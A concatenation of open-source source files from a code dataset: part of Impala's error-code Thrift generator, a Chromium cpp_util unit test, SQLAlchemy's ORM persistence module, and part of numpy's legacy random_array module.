("STALE_METADATA_FILE_TOO_SHORT", 60, "Metadata for file '$0' appears stale. "
"Try running \\\"refresh $1\\\" to reload the file metadata."),
("PARQUET_BAD_VERSION_NUMBER", 61, "File '$0' has an invalid version number: $1\\n"
"This could be due to stale metadata. Try running \\\"refresh $2\\\"."),
("SCANNER_INCOMPLETE_READ", 62, "Tried to read $0 bytes but could only read $1 bytes. "
"This may indicate data file corruption. (file $2, byte offset: $3)"),
("SCANNER_INVALID_READ", 63, "Invalid read of $0 bytes. This may indicate data file "
"corruption. (file $1, byte offset: $2)"),
("AVRO_BAD_VERSION_HEADER", 64, "File '$0' has an invalid version header: $1\\n"
"Make sure the file is an Avro data file."),
("UDF_MEM_LIMIT_EXCEEDED", 65, "$0's allocations exceeded memory limits."),
("BTS_BLOCK_OVERFLOW", 66, "Cannot process row that is bigger than the IO size "
"(row_size=$0, null_indicators_size=$1). To run this query, increase the IO size "
"(--read_size option)."),
("COMPRESSED_FILE_MULTIPLE_BLOCKS", 67,
"For better performance, snappy-, gzip-, and bzip-compressed files "
"should not be split into multiple HDFS blocks. file=$0 offset $1"),
("COMPRESSED_FILE_BLOCK_CORRUPTED", 68,
"$0 Data error, likely data corrupted in this block."),
("COMPRESSED_FILE_DECOMPRESSOR_ERROR", 69, "$0 Decompressor error at $1, code=$2"),
("COMPRESSED_FILE_DECOMPRESSOR_NO_PROGRESS", 70,
"Decompression failed to make progress, but end of input is not reached. "
"File appears corrupted. file=$0"),
("COMPRESSED_FILE_TRUNCATED", 71,
"Unexpected end of compressed file. File may be truncated. file=$0")
)
# Verifies the uniqueness of the error constants and numeric error codes.
# Numeric codes must start from 0, be in order and have no gaps
def check_duplicates(codes):
constants = {}
next_num_code = 0
for row in codes:
if row[0] in constants:
print("Constant %s already used, please check definition of '%s'!" % \
(row[0], constants[row[0]]))
exit(1)
if row[1] != next_num_code:
print("Numeric error codes must start from 0, be in order, and not have any gaps: "
"got %d, expected %d" % (row[1], next_num_code))
exit(1)
next_num_code += 1
constants[row[0]] = row[2]
preamble = """
// Copyright 2015 Cloudera Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
//
// THIS FILE IS AUTO GENERATED BY generated_error_codes.py DO NOT MODIFY
// IT BY HAND.
//
namespace cpp impala
namespace java com.cloudera.impala.thrift
"""
# The script will always generate the file, CMake will take care of running it only if
# necessary.
target_file = os.path.join(sys.argv[1], "ErrorCodes.thrift")
# Check uniqueness of error constants and numeric codes
check_duplicates(error_codes)
fid = open(target_file, "w+")
try:
fid.write(preamble)
fid.write("""\nenum TErrorCode {\n""")
fid.write(",\n".join(map(lambda x: " %s = %d" % (x[0], x[1]), error_codes)))
fid.write("\n}")
fid.write("\n")
fid.write("const list<string> TErrorMessage = [\n")
fid.write(",\n".join(map(lambda x: " // %s\n \"%s\"" %(x[0], x[2]), error_codes)))
fid.write("\n]")
finally:
fid.close()
print("%s created." % target_file)
| apache-2.0 |
Teamxrtc/webrtc-streaming-node | third_party/webrtc/src/chromium/src/tools/json_schema_compiler/cpp_util_test.py | 96 | 2096 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from cpp_util import (
Classname, CloseNamespace, GenerateIfndefName, OpenNamespace)
class CppUtilTest(unittest.TestCase):
def testClassname(self):
self.assertEquals('Permissions', Classname('permissions'))
self.assertEquals('UpdateAllTheThings',
Classname('updateAllTheThings'))
self.assertEquals('Aa_Bb_Cc', Classname('aa.bb.cc'))
def testNamespaceDeclaration(self):
self.assertEquals('namespace foo {',
OpenNamespace('foo').Render())
self.assertEquals('} // namespace foo',
CloseNamespace('foo').Render())
self.assertEquals(
'namespace extensions {\n'
'namespace foo {',
OpenNamespace('extensions::foo').Render())
self.assertEquals(
'} // namespace foo\n'
'} // namespace extensions',
CloseNamespace('extensions::foo').Render())
self.assertEquals(
'namespace extensions {\n'
'namespace gen {\n'
'namespace api {',
OpenNamespace('extensions::gen::api').Render())
self.assertEquals(
'} // namespace api\n'
'} // namespace gen\n'
'} // namespace extensions',
CloseNamespace('extensions::gen::api').Render())
self.assertEquals(
'namespace extensions {\n'
'namespace gen {\n'
'namespace api {\n'
'namespace foo {',
OpenNamespace('extensions::gen::api::foo').Render())
self.assertEquals(
'} // namespace foo\n'
'} // namespace api\n'
'} // namespace gen\n'
'} // namespace extensions',
CloseNamespace('extensions::gen::api::foo').Render())
def testGenerateIfndefName(self):
self.assertEquals('FOO_BAR_BAZ_H__', GenerateIfndefName('foo\\bar\\baz.h'))
self.assertEquals('FOO_BAR_BAZ_H__', GenerateIfndefName('foo/bar/baz.h'))
if __name__ == '__main__':
unittest.main()
| mit |
lebabouin/CouchPotatoServer-develop | libs/sqlalchemy/orm/persistence.py | 18 | 30463 | # orm/persistence.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""private module containing functions used to emit INSERT, UPDATE
and DELETE statements on behalf of a :class:`.Mapper` and its descending
mappers.
The functions here are called only by the unit of work functions
in unitofwork.py.
"""
import operator
from itertools import groupby
from sqlalchemy import sql, util, exc as sa_exc
from sqlalchemy.orm import attributes, sync, \
exc as orm_exc
from sqlalchemy.orm.util import _state_mapper, state_str
def save_obj(base_mapper, states, uowtransaction, single=False):
"""Issue ``INSERT`` and/or ``UPDATE`` statements for a list
of objects.
This is called within the context of a UOWTransaction during a
flush operation, given a list of states to be flushed. The
base mapper in an inheritance hierarchy handles the inserts/
updates for all descendant mappers.
"""
# if batch=false, call _save_obj separately for each object
if not single and not base_mapper.batch:
for state in _sort_states(states):
save_obj(base_mapper, [state], uowtransaction, single=True)
return
states_to_insert, states_to_update = _organize_states_for_save(
base_mapper,
states,
uowtransaction)
cached_connections = _cached_connection_dict(base_mapper)
for table, mapper in base_mapper._sorted_tables.iteritems():
insert = _collect_insert_commands(base_mapper, uowtransaction,
table, states_to_insert)
update = _collect_update_commands(base_mapper, uowtransaction,
table, states_to_update)
if update:
_emit_update_statements(base_mapper, uowtransaction,
cached_connections,
mapper, table, update)
if insert:
_emit_insert_statements(base_mapper, uowtransaction,
cached_connections,
table, insert)
_finalize_insert_update_commands(base_mapper, uowtransaction,
states_to_insert, states_to_update)
def post_update(base_mapper, states, uowtransaction, post_update_cols):
"""Issue UPDATE statements on behalf of a relationship() which
specifies post_update.
"""
cached_connections = _cached_connection_dict(base_mapper)
states_to_update = _organize_states_for_post_update(
base_mapper,
states, uowtransaction)
for table, mapper in base_mapper._sorted_tables.iteritems():
update = _collect_post_update_commands(base_mapper, uowtransaction,
table, states_to_update,
post_update_cols)
if update:
_emit_post_update_statements(base_mapper, uowtransaction,
cached_connections,
mapper, table, update)
def delete_obj(base_mapper, states, uowtransaction):
"""Issue ``DELETE`` statements for a list of objects.
This is called within the context of a UOWTransaction during a
flush operation.
"""
cached_connections = _cached_connection_dict(base_mapper)
states_to_delete = _organize_states_for_delete(
base_mapper,
states,
uowtransaction)
table_to_mapper = base_mapper._sorted_tables
for table in reversed(table_to_mapper.keys()):
delete = _collect_delete_commands(base_mapper, uowtransaction,
table, states_to_delete)
mapper = table_to_mapper[table]
_emit_delete_statements(base_mapper, uowtransaction,
cached_connections, mapper, table, delete)
for state, state_dict, mapper, has_identity, connection \
in states_to_delete:
mapper.dispatch.after_delete(mapper, connection, state)
def _organize_states_for_save(base_mapper, states, uowtransaction):
"""Make an initial pass across a set of states for INSERT or
UPDATE.
This includes splitting out into distinct lists for
each, calling before_insert/before_update, obtaining
key information for each state including its dictionary,
mapper, the connection to use for the execution per state,
and the identity flag.
"""
states_to_insert = []
states_to_update = []
for state, dict_, mapper, connection in _connections_for_states(
base_mapper, uowtransaction,
states):
has_identity = bool(state.key)
instance_key = state.key or mapper._identity_key_from_state(state)
row_switch = None
# call before_XXX extensions
if not has_identity:
mapper.dispatch.before_insert(mapper, connection, state)
else:
mapper.dispatch.before_update(mapper, connection, state)
# detect if we have a "pending" instance (i.e. has
# no instance_key attached to it), and another instance
# with the same identity key already exists as persistent.
# convert to an UPDATE if so.
if not has_identity and \
instance_key in uowtransaction.session.identity_map:
instance = \
uowtransaction.session.identity_map[instance_key]
existing = attributes.instance_state(instance)
if not uowtransaction.is_deleted(existing):
raise orm_exc.FlushError(
"New instance %s with identity key %s conflicts "
"with persistent instance %s" %
(state_str(state), instance_key,
state_str(existing)))
base_mapper._log_debug(
"detected row switch for identity %s. "
"will update %s, remove %s from "
"transaction", instance_key,
state_str(state), state_str(existing))
# remove the "delete" flag from the existing element
uowtransaction.remove_state_actions(existing)
row_switch = existing
if not has_identity and not row_switch:
states_to_insert.append(
(state, dict_, mapper, connection,
has_identity, instance_key, row_switch)
)
else:
states_to_update.append(
(state, dict_, mapper, connection,
has_identity, instance_key, row_switch)
)
return states_to_insert, states_to_update
def _organize_states_for_post_update(base_mapper, states,
uowtransaction):
"""Make an initial pass across a set of states for UPDATE
corresponding to post_update.
This includes obtaining key information for each state
including its dictionary, mapper, the connection to use for
the execution per state.
"""
return list(_connections_for_states(base_mapper, uowtransaction,
states))
def _organize_states_for_delete(base_mapper, states, uowtransaction):
"""Make an initial pass across a set of states for DELETE.
This includes calling out before_delete and obtaining
key information for each state including its dictionary,
mapper, the connection to use for the execution per state.
"""
states_to_delete = []
for state, dict_, mapper, connection in _connections_for_states(
base_mapper, uowtransaction,
states):
mapper.dispatch.before_delete(mapper, connection, state)
states_to_delete.append((state, dict_, mapper,
bool(state.key), connection))
return states_to_delete
def _collect_insert_commands(base_mapper, uowtransaction, table,
states_to_insert):
"""Identify sets of values to use in INSERT statements for a
list of states.
"""
insert = []
for state, state_dict, mapper, connection, has_identity, \
instance_key, row_switch in states_to_insert:
if table not in mapper._pks_by_table:
continue
pks = mapper._pks_by_table[table]
params = {}
value_params = {}
has_all_pks = True
for col in mapper._cols_by_table[table]:
if col is mapper.version_id_col:
params[col.key] = mapper.version_id_generator(None)
else:
# pull straight from the dict for
# pending objects
prop = mapper._columntoproperty[col]
value = state_dict.get(prop.key, None)
if value is None:
if col in pks:
has_all_pks = False
elif col.default is None and \
col.server_default is None:
params[col.key] = value
elif isinstance(value, sql.ClauseElement):
value_params[col] = value
else:
params[col.key] = value
insert.append((state, state_dict, params, mapper,
connection, value_params, has_all_pks))
return insert
def _collect_update_commands(base_mapper, uowtransaction,
table, states_to_update):
"""Identify sets of values to use in UPDATE statements for a
list of states.
This function works intricately with the history system
to determine exactly what values should be updated
as well as how the row should be matched within an UPDATE
statement. Includes some tricky scenarios where the primary
key of an object might have been changed.
"""
update = []
for state, state_dict, mapper, connection, has_identity, \
instance_key, row_switch in states_to_update:
if table not in mapper._pks_by_table:
continue
pks = mapper._pks_by_table[table]
params = {}
value_params = {}
hasdata = hasnull = False
for col in mapper._cols_by_table[table]:
if col is mapper.version_id_col:
params[col._label] = \
mapper._get_committed_state_attr_by_column(
row_switch or state,
row_switch and row_switch.dict
or state_dict,
col)
prop = mapper._columntoproperty[col]
history = attributes.get_state_history(
state, prop.key,
attributes.PASSIVE_NO_INITIALIZE
)
if history.added:
params[col.key] = history.added[0]
hasdata = True
else:
params[col.key] = mapper.version_id_generator(
params[col._label])
# HACK: check for history, in case the
# history is only
# in a different table than the one
# where the version_id_col is.
for prop in mapper._columntoproperty.itervalues():
history = attributes.get_state_history(
state, prop.key,
attributes.PASSIVE_NO_INITIALIZE)
if history.added:
hasdata = True
else:
prop = mapper._columntoproperty[col]
history = attributes.get_state_history(
state, prop.key,
attributes.PASSIVE_NO_INITIALIZE)
if history.added:
if isinstance(history.added[0],
sql.ClauseElement):
value_params[col] = history.added[0]
else:
value = history.added[0]
params[col.key] = value
if col in pks:
if history.deleted and \
not row_switch:
# if passive_updates and sync detected
# this was a pk->pk sync, use the new
# value to locate the row, since the
# DB would already have set this
if ("pk_cascaded", state, col) in \
uowtransaction.attributes:
value = history.added[0]
params[col._label] = value
else:
# use the old value to
# locate the row
value = history.deleted[0]
params[col._label] = value
hasdata = True
else:
# row switch logic can reach us here
# remove the pk from the update params
# so the update doesn't
# attempt to include the pk in the
# update statement
del params[col.key]
value = history.added[0]
params[col._label] = value
if value is None:
hasnull = True
else:
hasdata = True
elif col in pks:
value = state.manager[prop.key].impl.get(
state, state_dict)
if value is None:
hasnull = True
params[col._label] = value
if hasdata:
if hasnull:
raise sa_exc.FlushError(
"Can't update table "
"using NULL for primary "
"key value")
update.append((state, state_dict, params, mapper,
connection, value_params))
return update
def _collect_post_update_commands(base_mapper, uowtransaction, table,
states_to_update, post_update_cols):
"""Identify sets of values to use in UPDATE statements for a
list of states within a post_update operation.
"""
update = []
for state, state_dict, mapper, connection in states_to_update:
if table not in mapper._pks_by_table:
continue
pks = mapper._pks_by_table[table]
params = {}
hasdata = False
for col in mapper._cols_by_table[table]:
if col in pks:
params[col._label] = \
mapper._get_state_attr_by_column(
state,
state_dict, col)
elif col in post_update_cols:
prop = mapper._columntoproperty[col]
history = attributes.get_state_history(
state, prop.key,
attributes.PASSIVE_NO_INITIALIZE)
if history.added:
value = history.added[0]
params[col.key] = value
hasdata = True
if hasdata:
update.append((state, state_dict, params, mapper,
connection))
return update
def _collect_delete_commands(base_mapper, uowtransaction, table,
states_to_delete):
"""Identify values to use in DELETE statements for a list of
states to be deleted."""
delete = util.defaultdict(list)
for state, state_dict, mapper, has_identity, connection \
in states_to_delete:
if not has_identity or table not in mapper._pks_by_table:
continue
params = {}
delete[connection].append(params)
for col in mapper._pks_by_table[table]:
params[col.key] = \
value = \
mapper._get_state_attr_by_column(
state, state_dict, col)
if value is None:
raise sa_exc.FlushError(
"Can't delete from table "
"using NULL for primary "
"key value")
if mapper.version_id_col is not None and \
table.c.contains_column(mapper.version_id_col):
params[mapper.version_id_col.key] = \
mapper._get_committed_state_attr_by_column(
state, state_dict,
mapper.version_id_col)
return delete
def _emit_update_statements(base_mapper, uowtransaction,
cached_connections, mapper, table, update):
"""Emit UPDATE statements corresponding to value lists collected
by _collect_update_commands()."""
needs_version_id = mapper.version_id_col is not None and \
table.c.contains_column(mapper.version_id_col)
def update_stmt():
clause = sql.and_()
for col in mapper._pks_by_table[table]:
clause.clauses.append(col == sql.bindparam(col._label,
type_=col.type))
if needs_version_id:
clause.clauses.append(mapper.version_id_col ==\
sql.bindparam(mapper.version_id_col._label,
type_=mapper.version_id_col.type))
return table.update(clause)
statement = base_mapper._memo(('update', table), update_stmt)
rows = 0
for state, state_dict, params, mapper, \
connection, value_params in update:
if value_params:
c = connection.execute(
statement.values(value_params),
params)
else:
c = cached_connections[connection].\
execute(statement, params)
_postfetch(
mapper,
uowtransaction,
table,
state,
state_dict,
c.context.prefetch_cols,
c.context.postfetch_cols,
c.context.compiled_parameters[0],
value_params)
rows += c.rowcount
if connection.dialect.supports_sane_rowcount:
if rows != len(update):
raise orm_exc.StaleDataError(
"UPDATE statement on table '%s' expected to "
"update %d row(s); %d were matched." %
(table.description, len(update), rows))
elif needs_version_id:
util.warn("Dialect %s does not support updated rowcount "
"- versioning cannot be verified." %
c.dialect.dialect_description,
stacklevel=12)
def _emit_insert_statements(base_mapper, uowtransaction,
cached_connections, table, insert):
"""Emit INSERT statements corresponding to value lists collected
by _collect_insert_commands()."""
statement = base_mapper._memo(('insert', table), table.insert)
for (connection, pkeys, hasvalue, has_all_pks), \
records in groupby(insert,
lambda rec: (rec[4],
rec[2].keys(),
bool(rec[5]),
rec[6])
):
if has_all_pks and not hasvalue:
records = list(records)
multiparams = [rec[2] for rec in records]
c = cached_connections[connection].\
execute(statement, multiparams)
for (state, state_dict, params, mapper,
conn, value_params, has_all_pks), \
last_inserted_params in \
zip(records, c.context.compiled_parameters):
_postfetch(
mapper,
uowtransaction,
table,
state,
state_dict,
c.context.prefetch_cols,
c.context.postfetch_cols,
last_inserted_params,
value_params)
else:
for state, state_dict, params, mapper, \
connection, value_params, \
has_all_pks in records:
if value_params:
result = connection.execute(
statement.values(value_params),
params)
else:
result = cached_connections[connection].\
execute(statement, params)
primary_key = result.context.inserted_primary_key
if primary_key is not None:
# set primary key attributes
for pk, col in zip(primary_key,
mapper._pks_by_table[table]):
prop = mapper._columntoproperty[col]
if state_dict.get(prop.key) is None:
# TODO: would rather say:
#state_dict[prop.key] = pk
mapper._set_state_attr_by_column(
state,
state_dict,
col, pk)
_postfetch(
mapper,
uowtransaction,
table,
state,
state_dict,
result.context.prefetch_cols,
result.context.postfetch_cols,
result.context.compiled_parameters[0],
value_params)
def _emit_post_update_statements(base_mapper, uowtransaction,
cached_connections, mapper, table, update):
"""Emit UPDATE statements corresponding to value lists collected
by _collect_post_update_commands()."""
def update_stmt():
clause = sql.and_()
for col in mapper._pks_by_table[table]:
clause.clauses.append(col == sql.bindparam(col._label,
type_=col.type))
return table.update(clause)
statement = base_mapper._memo(('post_update', table), update_stmt)
# execute each UPDATE in the order according to the original
# list of states to guarantee row access order, but
# also group them into common (connection, cols) sets
# to support executemany().
for key, grouper in groupby(
update, lambda rec: (rec[4], rec[2].keys())
):
connection = key[0]
multiparams = [params for state, state_dict,
params, mapper, conn in grouper]
cached_connections[connection].\
execute(statement, multiparams)
def _emit_delete_statements(base_mapper, uowtransaction, cached_connections,
mapper, table, delete):
"""Emit DELETE statements corresponding to value lists collected
by _collect_delete_commands()."""
need_version_id = mapper.version_id_col is not None and \
table.c.contains_column(mapper.version_id_col)
def delete_stmt():
clause = sql.and_()
for col in mapper._pks_by_table[table]:
clause.clauses.append(
col == sql.bindparam(col.key, type_=col.type))
if need_version_id:
clause.clauses.append(
mapper.version_id_col ==
sql.bindparam(
mapper.version_id_col.key,
type_=mapper.version_id_col.type
)
)
return table.delete(clause)
for connection, del_objects in delete.iteritems():
statement = base_mapper._memo(('delete', table), delete_stmt)
connection = cached_connections[connection]
if need_version_id:
# TODO: need test coverage for this [ticket:1761]
if connection.dialect.supports_sane_rowcount:
rows = 0
# execute deletes individually so that versioned
# rows can be verified
for params in del_objects:
c = connection.execute(statement, params)
rows += c.rowcount
if rows != len(del_objects):
raise orm_exc.StaleDataError(
"DELETE statement on table '%s' expected to "
"delete %d row(s); %d were matched." %
(table.description, len(del_objects), c.rowcount)
)
else:
util.warn(
"Dialect %s does not support deleted rowcount "
"- versioning cannot be verified." %
connection.dialect.dialect_description,
stacklevel=12)
connection.execute(statement, del_objects)
else:
connection.execute(statement, del_objects)
def _finalize_insert_update_commands(base_mapper, uowtransaction,
states_to_insert, states_to_update):
"""finalize state on states that have been inserted or updated,
including calling after_insert/after_update events.
"""
for state, state_dict, mapper, connection, has_identity, \
instance_key, row_switch in states_to_insert + \
states_to_update:
if mapper._readonly_props:
readonly = state.unmodified_intersection(
[p.key for p in mapper._readonly_props
if p.expire_on_flush or p.key not in state.dict]
)
if readonly:
state.expire_attributes(state.dict, readonly)
# if eager_defaults option is enabled,
# refresh whatever has been expired.
if base_mapper.eager_defaults and state.unloaded:
state.key = base_mapper._identity_key_from_state(state)
uowtransaction.session.query(base_mapper)._load_on_ident(
state.key, refresh_state=state,
only_load_props=state.unloaded)
# call after_XXX extensions
if not has_identity:
mapper.dispatch.after_insert(mapper, connection, state)
else:
mapper.dispatch.after_update(mapper, connection, state)
def _postfetch(mapper, uowtransaction, table,
state, dict_, prefetch_cols, postfetch_cols,
params, value_params):
"""Expire attributes in need of newly persisted database state,
after an INSERT or UPDATE statement has proceeded for that
state."""
if mapper.version_id_col is not None:
prefetch_cols = list(prefetch_cols) + [mapper.version_id_col]
for c in prefetch_cols:
if c.key in params and c in mapper._columntoproperty:
mapper._set_state_attr_by_column(state, dict_, c, params[c.key])
if postfetch_cols:
state.expire_attributes(state.dict,
[mapper._columntoproperty[c].key
for c in postfetch_cols if c in
mapper._columntoproperty]
)
# synchronize newly inserted ids from one table to the next
# TODO: this still goes a little too often. would be nice to
# have definitive list of "columns that changed" here
for m, equated_pairs in mapper._table_to_equated[table]:
sync.populate(state, m, state, m,
equated_pairs,
uowtransaction,
mapper.passive_updates)
def _connections_for_states(base_mapper, uowtransaction, states):
"""Return an iterator of (state, state.dict, mapper, connection).
The states are sorted according to _sort_states, then paired
with the connection they should be using for the given
unit of work transaction.
"""
# if session has a connection callable,
# organize individual states with the connection
# to use for update
if uowtransaction.session.connection_callable:
connection_callable = \
uowtransaction.session.connection_callable
else:
connection = None
connection_callable = None
for state in _sort_states(states):
if connection_callable:
connection = connection_callable(base_mapper, state.obj())
elif not connection:
connection = uowtransaction.transaction.connection(
base_mapper)
mapper = _state_mapper(state)
yield state, state.dict, mapper, connection
def _cached_connection_dict(base_mapper):
# dictionary of connection->connection_with_cache_options.
return util.PopulateDict(
lambda conn:conn.execution_options(
compiled_cache=base_mapper._compiled_cache
))
def _sort_states(states):
pending = set(states)
persistent = set(s for s in pending if s.key is not None)
pending.difference_update(persistent)
return sorted(pending, key=operator.attrgetter("insert_order")) + \
sorted(persistent, key=lambda q:q.key[1])
| gpl-3.0 |
haripradhan/MissionPlanner | Lib/site-packages/numpy/oldnumeric/random_array.py | 87 | 11454 | # Backward compatible module for RandomArray
__all__ = ['ArgumentError','F','beta','binomial','chi_square', 'exponential',
'gamma', 'get_seed', 'mean_var_test', 'multinomial',
'multivariate_normal', 'negative_binomial', 'noncentral_F',
'noncentral_chi_square', 'normal', 'permutation', 'poisson',
'randint', 'random', 'random_integers', 'seed', 'standard_normal',
'uniform']
ArgumentError = ValueError
import numpy.random.mtrand as mt
import numpy as np
def seed(x=0, y=0):
if (x == 0 or y == 0):
mt.seed()
else:
mt.seed((x,y))
def get_seed():
raise NotImplementedError, \
"If you want to save the state of the random number generator.\n"\
"Then you should use obj = numpy.random.get_state() followed by.\n"\
"numpy.random.set_state(obj)."
def random(shape=[]):
"random(n) or random([n, m, ...]) returns array of random numbers"
if shape == []:
shape = None
return mt.random_sample(shape)
def uniform(minimum, maximum, shape=[]):
"""uniform(minimum, maximum, shape=[]) returns array of given shape of random reals
in given range"""
if shape == []:
shape = None
return mt.uniform(minimum, maximum, shape)
def randint(minimum, maximum=None, shape=[]):
"""randint(min, max, shape=[]) = random integers >=min, < max
If max not given, random integers >= 0, <min"""
if not isinstance(minimum, int):
raise ArgumentError, "randint requires first argument integer"
if maximum is None:
maximum = minimum
minimum = 0
if not isinstance(maximum, int):
raise ArgumentError, "randint requires second argument integer"
a = ((maximum-minimum)* random(shape))
if isinstance(a, np.ndarray):
return minimum + a.astype(np.int)
else:
return minimum + int(a)
def random_integers(maximum, minimum=1, shape=[]):
"""random_integers(max, min=1, shape=[]) = random integers in range min-max inclusive"""
return randint(minimum, maximum+1, shape)
def permutation(n):
"permutation(n) = a permutation of indices range(n)"
return mt.permutation(n)
def standard_normal(shape=[]):
"""standard_normal(n) or standard_normal([n, m, ...]) returns array of
random numbers normally distributed with mean 0 and standard
deviation 1"""
if shape == []:
shape = None
return mt.standard_normal(shape)
def normal(mean, std, shape=[]):
"""normal(mean, std, n) or normal(mean, std, [n, m, ...]) returns
array of random numbers randomly distributed with specified mean and
standard deviation"""
if shape == []:
shape = None
return mt.normal(mean, std, shape)
def multivariate_normal(mean, cov, shape=[]):
"""multivariate_normal(mean, cov) or multivariate_normal(mean, cov, [m, n, ...])
returns an array containing multivariate normally distributed random numbers
with specified mean and covariance.
mean must be a 1 dimensional array. cov must be a square two dimensional
array with the same number of rows and columns as mean has elements.
The first form returns a single 1-D array containing a multivariate
normal.
The second form returns an array of shape (m, n, ..., cov.shape[0]).
In this case, output[i,j,...,:] is a 1-D array containing a multivariate
normal."""
if shape == []:
shape = None
return mt.multivariate_normal(mean, cov, shape)
def exponential(mean, shape=[]):
"""exponential(mean, n) or exponential(mean, [n, m, ...]) returns array
of random numbers exponentially distributed with specified mean"""
if shape == []:
shape = None
return mt.exponential(mean, shape)
def beta(a, b, shape=[]):
"""beta(a, b) or beta(a, b, [n, m, ...]) returns array of beta distributed random numbers."""
if shape == []:
shape = None
return mt.beta(a, b, shape)
def gamma(a, r, shape=[]):
"""gamma(a, r) or gamma(a, r, [n, m, ...]) returns array of gamma distributed random numbers."""
if shape == []:
shape = None
return mt.gamma(a, r, shape)
def F(dfn, dfd, shape=[]):
"""F(dfn, dfd) or F(dfn, dfd, [n, m, ...]) returns array of F distributed random numbers with dfn degrees of freedom in the numerator and dfd degrees of freedom in the denominator."""
if shape == []:
shape = None
return mt.f(dfn, dfd, shape)
def noncentral_F(dfn, dfd, nconc, shape=[]):
"""noncentral_F(dfn, dfd, nonc) or noncentral_F(dfn, dfd, nonc, [n, m, ...]) returns array of noncentral F distributed random numbers with dfn degrees of freedom in the numerator and dfd degrees of freedom in the denominator, and noncentrality parameter nconc."""
if shape == []:
shape = None
return mt.noncentral_f(dfn, dfd, nconc, shape)
def chi_square(df, shape=[]):
"""chi_square(df) or chi_square(df, [n, m, ...]) returns array of chi squared distributed random numbers with df degrees of freedom."""
if shape == []:
shape = None
return mt.chisquare(df, shape)
def noncentral_chi_square(df, nconc, shape=[]):
"""noncentral_chi_square(df, nconc) or chi_square(df, nconc, [n, m, ...]) returns array of noncentral chi squared distributed random numbers with df degrees of freedom and noncentrality parameter."""
if shape == []:
shape = None
return mt.noncentral_chisquare(df, nconc, shape)
def binomial(trials, p, shape=[]):
"""binomial(trials, p) or binomial(trials, p, [n, m, ...]) returns array of binomially distributed random integers.
trials is the number of trials in the binomial distribution.
p is the probability of an event in each trial of the binomial distribution."""
if shape == []:
shape = None
return mt.binomial(trials, p, shape)
def negative_binomial(trials, p, shape=[]):
"""negative_binomial(trials, p) or negative_binomial(trials, p, [n, m, ...]) returns
array of negative binomially distributed random integers.
trials is the number of trials in the negative binomial distribution.
p is the probability of an event in each trial of the negative binomial distribution."""
if shape == []:
shape = None
return mt.negative_binomial(trials, p, shape)
def multinomial(trials, probs, shape=[]):
"""multinomial(trials, probs) or multinomial(trials, probs, [n, m, ...]) returns
array of multinomial distributed integer vectors.
trials is the number of trials in each multinomial distribution.
probs is a one dimensional array. There are len(prob)+1 events.
prob[i] is the probability of the i-th event, 0<=i<len(prob).
The probability of event len(prob) is 1.-np.sum(prob).
The first form returns a single 1-D array containing one multinomially
distributed vector.
The second form returns an array of shape (m, n, ..., len(probs)).
In this case, output[i,j,...,:] is a 1-D array containing a multinomially
distributed integer 1-D array."""
if shape == []:
shape = None
return mt.multinomial(trials, probs, shape)
def poisson(mean, shape=[]):
"""poisson(mean) or poisson(mean, [n, m, ...]) returns array of poisson
distributed random integers with specified mean."""
if shape == []:
shape = None
return mt.poisson(mean, shape)
def mean_var_test(x, type, mean, var, skew=[]):
n = len(x) * 1.0
x_mean = np.sum(x,axis=0)/n
x_minus_mean = x - x_mean
x_var = np.sum(x_minus_mean*x_minus_mean,axis=0)/(n-1.0)
print "\nAverage of ", len(x), type
print "(should be about ", mean, "):", x_mean
print "Variance of those random numbers (should be about ", var, "):", x_var
if skew != []:
x_skew = (np.sum(x_minus_mean*x_minus_mean*x_minus_mean,axis=0)/9998.)/x_var**(3./2.)
print "Skewness of those random numbers (should be about ", skew, "):", x_skew
def test():
obj = mt.get_state()
mt.set_state(obj)
obj2 = mt.get_state()
if (obj2[1] - obj[1]).any():
raise SystemExit, "Failed seed test."
print "First random number is", random()
print "Average of 10000 random numbers is", np.sum(random(10000),axis=0)/10000.
x = random([10,1000])
if len(x.shape) != 2 or x.shape[0] != 10 or x.shape[1] != 1000:
raise SystemExit, "random returned wrong shape"
x.shape = (10000,)
print "Average of 100 by 100 random numbers is", np.sum(x,axis=0)/10000.
y = uniform(0.5,0.6, (1000,10))
if len(y.shape) !=2 or y.shape[0] != 1000 or y.shape[1] != 10:
raise SystemExit, "uniform returned wrong shape"
y.shape = (10000,)
if np.minimum.reduce(y) <= 0.5 or np.maximum.reduce(y) >= 0.6:
raise SystemExit, "uniform returned out of desired range"
print "randint(1, 10, shape=[50])"
print randint(1, 10, shape=[50])
print "permutation(10)", permutation(10)
print "randint(3,9)", randint(3,9)
print "random_integers(10, shape=[20])"
print random_integers(10, shape=[20])
s = 3.0
x = normal(2.0, s, [10, 1000])
if len(x.shape) != 2 or x.shape[0] != 10 or x.shape[1] != 1000:
raise SystemExit, "standard_normal returned wrong shape"
x.shape = (10000,)
mean_var_test(x, "normally distributed numbers with mean 2 and variance %f"%(s**2,), 2, s**2, 0)
x = exponential(3, 10000)
mean_var_test(x, "random numbers exponentially distributed with mean %f"%(s,), s, s**2, 2)
x = multivariate_normal(np.array([10,20]), np.array(([1,2],[2,4])))
print "\nA multivariate normal", x
if x.shape != (2,): raise SystemExit, "multivariate_normal returned wrong shape"
x = multivariate_normal(np.array([10,20]), np.array([[1,2],[2,4]]), [4,3])
print "A 4x3x2 array containing multivariate normals"
print x
if x.shape != (4,3,2): raise SystemExit, "multivariate_normal returned wrong shape"
x = multivariate_normal(np.array([-100,0,100]), np.array([[3,2,1],[2,2,1],[1,1,1]]), 10000)
x_mean = np.sum(x,axis=0)/10000.
print "Average of 10000 multivariate normals with mean [-100,0,100]"
print x_mean
x_minus_mean = x - x_mean
print "Estimated covariance of 10000 multivariate normals with covariance [[3,2,1],[2,2,1],[1,1,1]]"
print np.dot(np.transpose(x_minus_mean),x_minus_mean)/9999.
x = beta(5.0, 10.0, 10000)
mean_var_test(x, "beta(5.,10.) random numbers", 0.333, 0.014)
x = gamma(.01, 2., 10000)
